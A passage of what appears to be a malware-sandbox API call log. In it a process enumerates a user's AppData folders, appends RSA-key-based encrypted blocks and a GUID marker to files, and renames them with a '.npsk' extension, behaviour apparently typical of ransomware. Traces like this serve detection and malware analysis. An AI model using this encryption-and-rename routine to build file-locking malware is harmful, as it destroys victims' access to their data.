lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 1 [0218.529] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned=".xml" [0218.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0218.530] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=13) returned 1 [0218.530] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0218.532] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xd, lpOverlapped=0x0) returned 1 [0218.533] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.535] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.535] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.535] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f08) returned 1 [0218.536] CryptCreateHash (in: hProv=0x7b1f08, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0218.536] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0218.536] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0218.537] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0218.537] GetLastError () returned 0x0 [0218.537] CryptDestroyHash (hHash=0x3277d68) returned 1 [0218.537] CryptReleaseContext (hProv=0x7b1f08, dwFlags=0x0) returned 1 [0218.537] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0218.537] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0218.537] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0218.537] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0218.537] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.538] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0218.538] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0218.538] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0218.538] CloseHandle (hObject=0x61c) returned 1 [0218.548] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.npsk")) returned 1 [0218.550] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 0 [0218.550] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.550] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.550] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.550] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\") returned="UV0DUWVB\\" [0218.550] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0218.550] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0218.551] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0218.551] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.551] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.551] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.551] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.551] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.551] PathFindFileNameW (pszPath="") returned="" [0218.551] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.552] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.552] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.552] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.552] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.553] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.553] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\") returned="VGMTOI09\\" [0218.553] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0218.553] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0218.553] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0218.553] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.553] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.553] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.553] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.553] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.553] PathFindFileNameW (pszPath="") returned="" [0218.553] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.555] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.555] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.msn[1].xml", cAlternateFileName="WWWMSN~1.XML")) returned 1 [0218.555] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned=".xml" [0218.555] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0218.556] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=836) returned 1 [0218.556] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0218.558] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x31e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.558] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0218.560] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x344, lpOverlapped=0x0) returned 1 [0218.560] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.560] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.561] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.561] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f08) returned 1 [0218.562] CryptCreateHash (in: hProv=0x7b1f08, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0218.562] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0218.562] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0218.562] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0218.562] GetLastError () returned 0x0 [0218.562] CryptDestroyHash (hHash=0x3277d68) returned 1 [0218.562] CryptReleaseContext (hProv=0x7b1f08, dwFlags=0x0) returned 1 [0218.562] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0218.562] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0218.562] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0218.562] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0218.563] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x344, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.563] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0218.563] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0218.563] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0218.563] CloseHandle (hObject=0x61c) returned 1 [0218.567] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.npsk")) returned 1 [0218.569] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.msn[1].xml", cAlternateFileName="WWWMSN~1.XML")) returned 0 [0218.570] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.570] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.570] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.570] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\") returned="security\\" [0218.570] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0218.570] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0218.570] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0218.570] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.570] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.570] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.570] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.570] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.570] PathFindFileNameW (pszPath="") returned="" [0218.571] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.574] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.574] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.574] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.574] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.574] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="tmp\\" [0218.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0218.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS 